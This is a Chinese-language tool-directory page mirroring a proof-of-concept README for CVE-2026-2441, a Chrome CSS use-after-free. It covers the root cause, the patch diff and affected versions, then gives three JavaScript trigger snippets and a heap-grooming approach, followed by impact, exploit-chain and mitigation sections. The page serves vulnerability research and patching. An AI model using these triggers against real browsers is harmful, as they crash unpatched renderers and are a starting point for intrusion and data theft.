Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-2441-PoC — CVE-2026-2441 的概念验证,这是一个 Chrome CSS 释放后使用漏洞,可导致沙箱化渲染器远程代码执行。包含三种触发方法、堆整理以及详细分析。 | Kitploit
工具/GitHubGitHub/d3b0j33t/cve-2026-2441-poc
漏洞分析漏洞利用Web应用程序漏洞利用论文与研究学习与教育
GitHubd3b0j33t/cve-2026-2441-poc

CVE-2026-2441-PoC

CVE-2026-2441 的概念验证,这是一个 Chrome CSS 释放后使用漏洞,可导致沙箱化渲染器远程代码执行。包含三种触发方法、堆整理以及详细分析。

查看仓库
5个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2026-2441 — Chrome CSSFontFeatureValuesMap 释放后使用

CVSS 8.8(高危) | 已在野外被积极利用 | 渲染器 RCE(沙箱内)

Google Chrome 的 Blink CSS 引擎中存在一个释放后使用漏洞,允许远程攻击者通过精心构造的 HTML 页面在浏览器沙箱内执行任意代码。

漏洞详情

字段值
CVECVE-2026-2441
CVSS8.8(高危)
类型释放后使用(CWE-416)
组件Blink CSS — CSSFontFeatureValuesMap
源文件third_party/blink/renderer/core/css/css_font_feature_values_map.cc
修复提交63f3cb4864c64c677cd60c76c8cb49d37d08319c
报告者Shaheen Fazim(2026-02-11)
补丁日期2026-02-13
野外利用是 — Google 已确认存在活跃利用

受影响版本

平台受影响已修复
Windows / macOS(稳定版)< 145.0.7632.75>= 145.0.7632.75
Linux(稳定版)< 144.0.7559.75>= 144.0.7559.75
Windows / macOS(扩展稳定版)< 144.0.7559.177>= 144.0.7559.177
基于 Chromium 的浏览器(Edge、Brave、Opera、Vivaldi)请查阅厂商公告各不相同

根本原因

FontFeatureValuesMapIterationSource 存储了一个指向内部 FontFeatureAliases HashMap 的原始指针(const FontFeatureAliases* aliases_)。当在迭代期间通过 set() 或 delete() 修改该映射时,HashMap 会进行重新哈希——分配新的存储空间并释放旧的。原始指针变为悬垂指针,下一次调用 FetchNextItem() 时会从已释放的内存中读取数据。

易受攻击的代码路径

root@kitploit:~
CreateIterationSource()
  → FontFeatureValuesMapIterationSource(map, aliases_)
  → aliases_ = 指向内部 HashMap 的原始指针
  → iterator_ = aliases_->begin()

FetchNextItem()
  → 读取 iterator_->key(通过 aliases_)

如果在两次迭代之间调用了 map.set() / map.delete():
  → HashMap 重新哈希(新分配,旧释放)
  → aliases_ → 悬垂指针
  → iterator_ → 失效
  → 下一次 FetchNextItem() → 释放后使用

修复

root@kitploit:~
- const FontFeatureAliases* aliases_;   // 原始指针 → 重新哈希后悬垂
+ const FontFeatureAliases aliases_;    // 深拷贝 → 不受重新哈希影响

该修复将原始指针替换为 HashMap 的深拷贝。即使原始映射重新哈希,迭代器也在其自身的副本上操作,从而防止悬垂指针。

概念验证

使用方法

  1. 在易受攻击的 Chrome 版本(< 145.0.7632.75)中打开 poc.html
  2. 该页面将尝试通过三种不同的方法触发 UAF

预期结果

Chrome 版本预期行为
< 145.0.7632.75(未修补)渲染器崩溃 — STATUS_ACCESS_VIOLATION(Windows)或 SIGSEGV(Linux/macOS)。Chrome 显示“无法打开此页面”错误。
>= 145.0.7632.75(已修补)无崩溃 — PoC 运行至完成,所有条目均正常读取。

截图(未修补的 Chrome — 崩溃)

在易受攻击的 Chrome 版本中打开时,渲染器进程会以 STATUS_ACCESS_VIOLATION 崩溃:

root@kitploit:~
无法打开此页面

错误代码:STATUS_ACCESS_VIOLATION

这确认了 UAF 已被触发——悬垂指针访问了已释放/未映射的内存,导致渲染器进程终止。

PoC 的工作原理

该 PoC 通过三种独立方法触发 UAF:

方法 1:entries() 迭代器 + 修改循环

root@kitploit:~
const iterator = map.entries();
while (step < 20) {
    iterator.next();          // 通过(现已悬垂的)指针读取
    map.delete(key);          // 触发重新哈希
    for (i = 0; i < 512; i++)
        map.set("spray_" + i, [i]);  // 强制重新分配
}

方法 2:for...of + 并发修改

root@kitploit:~
for (const [k, v] of map) {
    map.delete(k);
    for (i = 0; i < 512; i++)
        map.set("alt_" + i, [i]);
}

方法 3:requestAnimationFrame + 布局重算

root@kitploit:~
function rafTrigger() {
    document.body.offsetWidth;   // 强制布局重算
    const result = iterator.next();
    map.delete(k);
    for (i = 0; i < 512; i++)
        map.set("raf_" + i, [i]);
    requestAnimationFrame(rafTrigger);
}

每种方法还包含堆喷射整理——分配 50 个相同大小的 @font-feature-values 规则,使堆布局可预测,以便潜在的利用。

影响

直接影响(沙箱范围内)

  • 在渲染器进程沙箱内执行任意代码
  • 信息泄露 — 泄露 V8 堆指针(绕过 ASLR)、读取渲染器内存内容
  • 凭据窃取 — 读取 document.cookie、localStorage、sessionStorage、表单输入值
  • 会话劫持 — 窃取会话令牌,通过 fetch() / WebSocket / sendBeacon() 外传
  • DOM 操纵 — 注入钓鱼表单、修改页面内容
  • 键盘记录 — 通过 addEventListener('keydown') 捕获所有按键

链式利用(配合沙箱逃逸)

当与单独的沙箱逃逸漏洞结合时:

root@kitploit:~
渲染器 RCE(CVE-2026-2441)
    → Mojo IPC 利用 → 浏览器进程 RCE
        → 内核利用 → 完全控制系统
            → 恶意软件 / 勒索软件 / 间谍软件安装
            → 文件系统访问、横向移动、持久化

使用类似浏览器 UAF 的真实世界利用链:

  • NSO Pegasus — WebKit UAF + 沙箱逃逸 + 内核利用
  • Intellexa Predator — Chrome UAF + Android 内核利用
  • APT-28(Fancy Bear) — Chrome 0-day + Windows LPE 链

攻击向量

该漏洞可通过路过式下载进行利用——无需用户交互,只需访问恶意页面即可:

  • 恶意广告 — 通过合法广告网络投放的恶意广告
  • 水坑攻击 — 入侵目标经常访问的网站
  • 鱼叉式网络钓鱼 — 通过电子邮件或即时消息发送精心构造的链接

缓解措施

  1. 将 Chrome 更新至 >= 145.0.7632.75(Windows/macOS)或 >= 144.0.7559.75(Linux)
  2. 更新基于 Chromium 的浏览器(Edge、Brave、Opera、Vivaldi),当厂商补丁可用时
  3. 确认已启用站点隔离(chrome://flags/#site-isolation-trial-opt-out)
  4. 监控端点上低于修复版本的 Chrome 版本

时间线

日期事件
2026-02-11漏洞由 Shaheen Fazim 报告
2026-02-13Google 发布 Chrome 145.0.7632.75/76(Windows/macOS)、144.0.7559.75(Linux)
2026-02-13Google 确认存在野外利用
2026-02-16Vivaldi 和 Opera 发布修复

参考

  • Google Chrome 发布博客
  • NVD — CVE-2026-2441
  • The Hacker News — 正在被积极攻击的 Chrome 零日漏洞
  • Chromium 问题跟踪器(受限)

支持

如果您觉得这项研究有用,可以考虑请我喝杯咖啡:

Buy Me A Coffee

免责声明

此概念验证仅用于教育和授权的安全研究目的。未经明确许可对系统使用此 PoC 是非法的且不道德的。作者对任何滥用行为概不负责。

许可证

MIT

下载工具